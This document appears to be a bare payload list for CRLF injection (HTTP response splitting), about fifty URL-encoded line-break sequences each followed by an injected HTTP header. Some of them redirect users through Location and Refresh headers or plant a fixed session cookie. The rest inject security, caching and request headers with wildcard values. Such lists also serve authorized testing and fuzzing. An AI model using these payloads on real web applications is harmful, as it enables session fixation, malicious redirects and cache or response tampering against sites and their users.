%0d%0aheader:header
%0d%0aheader:header%0d%0a
%0d%0aheader:header%0d%0aheader2:header2
%0d%0aLocation:http://example.com
%0d%0aSet-Cookie:sessionid=123
%0d%0aContent-Type:text/html
%0d%0aRefresh:0;url=http://example.com
%0d%0aX-Frame-Options:DENY
%0d%0aX-Content-Type-Options:nosniff
%0d%0aX-XSS-Protection:1;mode=block
%0d%0aContent-Security-Policy:default-src 'self'
%0d%0aStrict-Transport-Security:max-age=31536000
%0d%0aX-Download-Options:noopen
%0d%0aX-Permitted-Cross-Domain-Policies:none
%0d%0aX-UA-Compatible:IE=edge
%0d%0aCache-Control:no-cache
%0d%0aPragma:no-cache
%0d%0aExpires:0
%0d%0aLast-Modified:0
%0d%0aIf-Modified-Since:0
%0d%0aIf-Unmodified-Since:0
%0d%0aIf-Match:*
%0d%0aIf-None-Match:*
%0d%0aAccept:*/*
%0d%0aAccept-Language:*
%0d%0aAccept-Encoding:*
%0d%0aAccept-Charset:*
%0d%0aUser-Agent:*
%0d%0aReferer:*
%0d%0aAuthorization:*
%0d%0aCookie:*
%0d%0aConnection:*
%0d%0aHost:*
%0d%0aContent-Length:*
%0d%0aContent-Type:*
%0d%0aContent-Encoding:*
%0d%0aContent-Language:*
%0d%0aContent-Location:*
%0d%0aContent-MD5:*
%0d%0aContent-Range:*
%0d%0aContent-Disposition:*
%0d%0aDate:*
%0d%0aServer:*
%0d%0aX-Powered-By:*
%0d%0aX-AspNet-Version:*
%0d%0aX-AspNetMvc-Version:*
%0d%0aX-Request-With:*
%0d%0aX-Do-Not-Track:*
%0d%0aDNT:*
%0d%0aUpgrade:*
%0d%0aVia:*
%0d%0aWarning:*
